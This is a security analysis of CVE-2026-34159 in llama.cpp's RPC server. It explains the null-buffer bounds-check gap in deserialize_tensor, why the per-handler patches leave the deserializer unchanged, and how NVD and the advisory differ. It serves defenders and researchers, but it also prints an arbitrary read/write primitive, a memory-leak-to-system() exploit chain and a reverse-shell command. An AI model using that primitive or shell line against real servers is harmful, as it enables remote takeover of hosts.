CVE-2026-34159: The Deserializer Three CVEs Have Not Patched

The 2024 fix is per-handler. The deserializer is not.

deserialize_tensor lives in ggml/src/ggml-rpc/ggml-rpc.cpp. It is the single deserialization point for tensors that arrive on the RPC server's TCP socket. Its job is to read a wire-format rpc_tensor (296 bytes, fixed layout) and produce a ggml_tensor that the rest of the server can compute over.

The wire format includes a 64-bit data pointer and a 64-bit buffer pointer. The buffer pointer is a handle the client received from a previous ALLOC_BUFFER reply; the server expects to recognize it. The data pointer names the address inside that buffer where the tensor's elements live. Both fields are honest most of the time. The threat model is the case where they are not.
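The 296-byte figure can be sanity-checked with a short Python sketch. The field order, names, and widths below are an assumption, reconstructed from memory of the packed rpc_tensor struct around the affected builds. Only the total size and the two 64-bit pointer fields come from the description above.

```python
import struct

# Assumed layout of the packed wire struct (little-endian, no padding).
# Field names and element counts are illustrative, not copied from the tree.
RPC_TENSOR_FIELDS = [
    ("id",        "Q"),    # 64-bit tensor id
    ("type",      "I"),
    ("buffer",    "Q"),    # 64-bit buffer handle sent by the client
    ("ne",        "4I"),
    ("nb",        "4I"),
    ("op",        "I"),
    ("op_params", "16i"),
    ("flags",     "i"),
    ("src",       "10Q"),
    ("view_src",  "Q"),
    ("view_offs", "Q"),
    ("data",      "Q"),    # 64-bit data pointer sent by the client
    ("name",      "64s"),
    ("padding",   "4s"),
]

RPC_TENSOR_FORMAT = "<" + "".join(code for _, code in RPC_TENSOR_FIELDS)
RPC_TENSOR_SIZE = struct.calcsize(RPC_TENSOR_FORMAT)


def field_offset(name):
    """Byte offset of a field within the assumed layout."""
    prefix = "<"
    for field, code in RPC_TENSOR_FIELDS:
        if field == name:
            return struct.calcsize(prefix)
        prefix += code
    raise KeyError(name)
```

Under this assumed layout the two fields the threat model cares about are plain 8-byte integers at fixed offsets, which is why a client can put any value it likes in them.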

The 2024 fix's structure inside deserialize_tensor, verbatim from current master:

result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
    result->buffer = nullptr;
}

if (result->buffer) {
    // require that the tensor data does not go beyond the buffer end
    uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
    uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
    uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
    GGML_ASSERT(tensor->data + tensor_size >= tensor->data);
    GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
}

result->op = (ggml_op) tensor->op;
...
result->data = reinterpret_cast<void *>(tensor->data);

Three behaviors. First: cast the wire's buffer field to a pointer. Second: if that pointer is non-null but is not in the server's buffers set, replace it with null. Third: only run the data-bounds check when result->buffer is set. The data field is then assigned unconditionally at the bottom of the function. A tensor with buffer=0 (a null cast from the wire) reaches the assignment with no bounds enforcement, carrying whatever 64-bit value the network put in tensor->data.
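The control flow is easier to see in a small model. The Python sketch below mirrors the three behaviors using plain integers. The function name, the known_buffers mapping, and its (base, size) tuples are hypothetical stand-ins for the server's state, not the real API.

```python
MASK64 = (1 << 64) - 1


def deserialize_model(wire_buffer, wire_data, tensor_size, known_buffers):
    """Model of the checks described above.

    known_buffers maps a buffer handle to (base_address, size).
    Returns the (buffer, data) pair the caller would receive.
    """
    buffer = wire_buffer
    # Behavior 2: a non-null handle the server does not recognize becomes null.
    if buffer and buffer not in known_buffers:
        buffer = 0
    # Behavior 3: bounds are enforced only when a buffer survived the lookup.
    if buffer:
        base, size = known_buffers[buffer]
        end = (wire_data + tensor_size) & MASK64  # uint64 wraparound
        if end < wire_data:
            raise AssertionError("data + size overflowed")
        if wire_data < base or end > base + size:
            raise AssertionError("tensor data outside buffer")
    # The data field is assigned unconditionally.
    return buffer, wire_data
```

In this model a null handle and an unrecognized handle behave the same way: both end with buffer set to 0, both skip the bounds branch, and both return the caller-supplied data value untouched.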

The 2024 patch's defensive layer was outside this function. From the GHSA's "Relation to prior CVEs" section, written by the reporter:

All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (graph_compute() -> create_node() -> deserialize_tensor()) that was never patched.

The 2024 fix was per-handler. set_tensor got its own bounds check. get_tensor got its own. deserialize_tensor got the partial check that runs only when the buffer field is verifiable. create_node, the entry point for GRAPH_COMPUTE, got nothing. From August 2024 to March 2026, an attacker who sent a tensor with buffer=0 through GRAPH_COMPUTE was reaching code that had not been told the input might be hostile.

The wire format ships an arbitrary R/W primitive, and GRAPH_COMPUTE consumes it.

Hassan Ali's PoC at casp3r0x0/CVE-2026-34159 is a single Python script under 350 lines, targeting llama.cpp build b8487. It opens a TCP connection to the RPC port, sends RPC_CMD_HELLO (command code 14), and starts allocating buffers. Two RPC commands, ALLOC_BUFFER and BUFFER_GET_BASE, are needed before the primitive. The command codes involved:

RPC_CMD_ALLOC_BUFFER     = 0
RPC_CMD_BUFFER_GET_BASE  = 3
RPC_CMD_SET_TENSOR       = 6
RPC_CMD_GET_TENSOR       = 8
RPC_CMD_GRAPH_COMPUTE    = 10

ALLOC_BUFFER returns a (remote_ptr, size) pair where remote_ptr is a server-side ggml_backend_buffer*. BUFFER_GET_BASE resolves that handle to the buffer's actual data region. After these two commands the client holds two things: a handle the server recognizes, so future bounds checks against this buffer pass, and the absolute address of the buffer's data region, so the client can compute offsets inside it.

The exploit primitive is one GRAPH_COMPUTE graph with two tensors:

src = self._pack_tensor(0x3001, 0,          target_addr,  GGML_OP_NONE, [],       n_elems)
dst = self._pack_tensor(0x3002, remote_ptr, buffer_base,  GGML_OP_CPY,  [0x3001], n_elems, flags=16)

Source tensor: buffer = 0, data = target_addr. Inside deserialize_tensor, the buffer cast is null, the lookup branch is unreached, the bounds-check branch is skipped. The server returns a ggml_tensor whose data pointer is target_addr, the address the attacker named.

Destination tensor: buffer = remote_ptr (the handle from ALLOC_BUFFER, which IS in the server's buffers set), data = buffer_base (the real address of the buffer's data region). The buffer is recognized, the bounds check runs, the destination passes honestly.

create_node calls deserialize_tensor for both. Both return non-null. The pre-patch check, if (result == nullptr), rejects neither. The graph is queued and executed. The CPY kernel performs memcpy(buffer_base, target_addr, n_bytes). The server has just read from any address the attacker named and copied the bytes into a buffer the attacker can pull back with GET_TENSOR.

That is an arbitrary read in two RPC commands, GRAPH_COMPUTE followed by GET_TENSOR. Reversing source and destination yields an arbitrary write. Both primitives bypass the bounds check because one tensor of the pair has buffer=0, and the bounds check runs only when the buffer field is verifiable.

The exploit chain after the primitives is conventional. The PoC reads the iface.get_base function pointer from the staging buffer's ggml_backend_buffer struct, scans backward in 4 KiB pages for the ELF magic to find libggml-base.so, reads the GOT slot for memcpy to leak libc, scans backward for libc's ELF magic, fetches libc's .note.gnu.build-id, queries libc.rip for system()'s offset by build-id, writes bash -c "bash -i>&/dev/tcp/<lhost>/<lport> 0>&1" and the resolved system() address into the staging buffer, and arbitrary-writes those 64 bytes over the staging buffer's own iface struct, replacing iface->clear with system(). Then the PoC sends RPC_CMD_BUFFER_CLEAR, which calls iface->clear(buf). The reverse shell connects back.

The seven phases of the chain are bookkeeping. The primitive is: the RPC server will perform a memcpy from any address to any address on the network's request, repeatedly.

The 2026 fix is at the call site. The deserializer is unchanged.

The patch in commit 39bf0d3 replaces one line with three:

     struct ggml_tensor * result = deserialize_tensor(ctx, tensor);
-    if (result == nullptr) {
+    if (result == nullptr || result->buffer == nullptr) {
+        GGML_LOG_ERROR("[%s] invalid tensor: null %s (id=%" PRIu64 ")\n",
+                       __func__, result == nullptr ? "tensor" : "buffer", id);
         return nullptr;
     }

The change is in create_node, inside the GRAPH_COMPUTE handler. deserialize_tensor is not modified. The maintainer who merged it noted on the PR that "tensor views within the compute graph are initialized through ggml_backend_view_init(), which includes assertions that prevent null buffer pointers in valid tensors. This validation makes the additional check sufficiently protective."
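The difference between the two conditions can be stated as a pair of predicates. This is a minimal Python model of the diff above, with a hypothetical Tensor tuple standing in for ggml_tensor and 0 standing in for a null pointer. It models the check only, not the rest of create_node.

```python
from typing import NamedTuple, Optional


class Tensor(NamedTuple):
    buffer: int  # 0 models a null buffer pointer
    data: int    # whatever 64-bit value arrived on the wire


def accepts_pre_patch(result: Optional[Tensor]) -> bool:
    # Pre-patch condition: only a null result is rejected.
    return result is not None


def accepts_patched(result: Optional[Tensor]) -> bool:
    # Patched condition: a null result or a null buffer is rejected.
    return result is not None and result.buffer != 0
```

A tensor such as Tensor(buffer=0, data=0xdeadbeef) passes the first predicate and fails the second, which is the whole effect of the patch at this call site.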

The 2026 patch follows the 2024 patch's shape. Each patch closes the specific call site that the specific CVE reached. set_tensor got its own bounds check in 2024. get_tensor got its own in 2024. create_node got its null check in 2026. The function they all call still returns tensors with null buffers and attacker-controlled data pointers.

The maintainer's reasoning is correct for the existing handlers. The bounds checks in set_tensor and get_tensor validate tensor->data directly against the buffer the wire claims. The create_node null check rejects null-buffer tensors before they reach a kernel. Together they cover the four RPC commands that pass tensors to dangerous code: SET_TENSOR, GET_TENSOR, COPY_TENSOR, GRAPH_COMPUTE. Any future RPC command that calls deserialize_tensor and uses result->data will need its own equivalent guard at its own call site. The contract of deserialize_tensor is still: return a struct whose pointers may be whatever the network said.

Three CVEs reach the same deserializer.

CVE-2024-42478 (b3561, August 2024): "The unsafe data pointer member in the rpc_tensor structure can cause arbitrary address reading." Reached through GET_TENSOR. Patched by adding a bounds check in get_tensor.

CVE-2024-42479 (b3561, August 2024): "The unsafe data pointer member in the rpc_tensor structure can cause arbitrary address writing." Reached through SET_TENSOR. Patched by adding a bounds check in set_tensor.

CVE-2026-34159 (b8492, March 2026): "The RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0." Reached through GRAPH_COMPUTE. Patched by adding a null-buffer check in create_node.

Three CVEs. Three fixes. Three different RPC handlers. One file. The deserialization function that produces the unsafe tensor in every path is the same in 2026 as it was before any of the three patches landed. From the reporter's own writeup of CVE-2026-34159, in the GHSA: "All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0."

This is what Design Debt Driver names. A component whose architecture produces the same bug class on a cadence, where each patch closes the specific instance and leaves the substrate intact. Tomcat's EncryptInterceptor shipped two CVEs from the same messageReceived method this season, the second introduced by the patch for the first. llama.cpp's RPC backend produces them by handler: every command that takes a tensor on the wire is its own opportunity for the wire's data pointer to escape. Closing the symptom in three handlers does not change the deserializer's contract. The next handler that calls deserialize_tensor and uses result->data without a local guard reproduces the primitive.

The closer kin is Unpatchable Primitive. The RPC backend's job is to deserialize attacker-controlled tensor structures from the network and execute compute graphs over them. The structures contain pointers; the compute graphs run memcpy. Removing the primitive cleanly would mean rejecting every tensor whose data field cannot be proven to lie inside a known buffer, regardless of which call site reached the deserializer. That is a refactor of deserialize_tensor, not a guard at one of its consumers. Two CVE cycles have ended without that refactor.
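What such a contract could look like, as a sketch only: the Python model below fails closed, so no tensor leaves the deserializer unless its data range is proven to sit inside a buffer the server knows. The names (deserialize_strict, InvalidTensor, known_buffers) are hypothetical, and this is not the upstream fix. It also assumes no legitimate graph needs a tensor with a null buffer, which would have to be confirmed against real workloads.

```python
MASK64 = (1 << 64) - 1


class InvalidTensor(ValueError):
    """Raised when a wire tensor cannot be proven safe."""


def deserialize_strict(wire_buffer, wire_data, tensor_size, known_buffers):
    """Hypothetical fail-closed deserializer model.

    known_buffers maps a buffer handle to (base_address, size).
    Returns (buffer, data) only when the data range is inside that buffer.
    """
    # A null or unrecognized handle is rejected, never downgraded to null.
    if wire_buffer == 0 or wire_buffer not in known_buffers:
        raise InvalidTensor("null or unknown buffer handle")
    base, size = known_buffers[wire_buffer]
    end = wire_data + tensor_size
    # Reject ranges that would wrap a 64-bit address.
    if end > MASK64:
        raise InvalidTensor("data + size overflows 64 bits")
    if wire_data < base or end > base + size:
        raise InvalidTensor("tensor data outside buffer")
    return wire_buffer, wire_data
```

With a contract like this the guard lives in one place, and a new handler that forgets a local check inherits the validation instead of the primitive.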

What the advisory says, and what NVD does not.

The GHSA includes a "Relation to prior CVEs" section that names CVE-2024-42478, CVE-2024-42479, and the architectural fact that the GRAPH_COMPUTE path was never patched. The reporter, GitHub user las7, wrote that section himself and filed via CERT/CC on February 8, 2026. The advisory text says the three CVEs share one root cause.

NVD's CVE-2026-34159 entry says the bug is missing bounds validation when buffer=0 and that the patch is in version b8492. It does not link to the 2024 CVEs. The CWE assigned is CWE-119, the same CWE assigned to CVE-2024-42478 and CVE-2024-42479. A defender reading NVD sees a single CVE with a buffer-validation bug. A defender reading the GHSA sees the third CVE in a class that the reporter has named.

The 2024 fix that produced the partial bounds check inside deserialize_tensor also moved the RPC server's default bind address from 0.0.0.0 to 127.0.0.1 and added a runtime warning when the operator binds elsewhere. The README warns, in 2026 as in 2024, that the RPC backend is "currently in a proof-of-concept development stage" and that exposing the port is "dangerous and should be avoided." The CVSS:3.1 vector on the new CVE is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: network-reachable, low complexity, no privileges, no interaction. The README's framing assumes operators who read warnings. The CVSS framing assumes operators who deploy the feature anyway. The 2024 default-bind change addressed the first audience. The exploit chain works against the second.
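For operators in the second audience, the bind address is the one setting worth auditing. The sketch below is a hypothetical helper, not part of llama.cpp, that classifies a configured address using Python's standard ipaddress module. It accepts IP literals only. A hostname such as localhost raises ValueError and would need resolving first.

```python
import ipaddress


def bind_exposure(host: str) -> str:
    """Classify a bind address as 'loopback', 'all-interfaces', or 'specific'."""
    addr = ipaddress.ip_address(host)
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified:
        # 0.0.0.0 or :: listens on every interface.
        return "all-interfaces"
    return "specific"
```

Anything other than "loopback" means the RPC port is reachable from wherever the network allows, which is the condition the CVSS vector describes.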

PoC: casp3r0x0/CVE-2026-34159

Three CVEs reach the same deserializer. The three patches do not touch the deserializer.